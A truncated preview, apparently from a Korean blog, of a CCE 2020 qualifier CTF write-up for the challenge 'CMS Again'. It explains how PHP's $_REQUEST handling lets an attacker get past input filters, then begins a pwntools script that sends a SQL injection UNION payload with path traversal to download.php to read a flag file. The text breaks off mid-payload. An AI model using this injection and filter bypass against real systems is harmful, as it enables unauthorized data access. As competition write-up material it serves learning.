[CCE 2020] 사이버공격방어대회 예선 풀이
CMS Again php의 _REQUEST 변수는 GET, POST 두 메소드를 모두 받을 수 있지만, 두 메소드가 한번에 들어올 경우 POST 메소드가 우선적으로 처리되어 GET 으로 받은 값이 무시된다는 특징이 있습니다. 따라서 위 global filter들을 우회하여 download.php에서 sql injection 취약점을 트리거할 수 있습니다. from pwn import * p=remote('54.180.79.80',80) #+union+select+1,2,3,'/var/www/html/flag',5,6,7,8--+- payload = '''POST /download.php?idx=1'union%20select%201,2,3,'../../../../flag','../../../../../fl..
2022. 1. 11.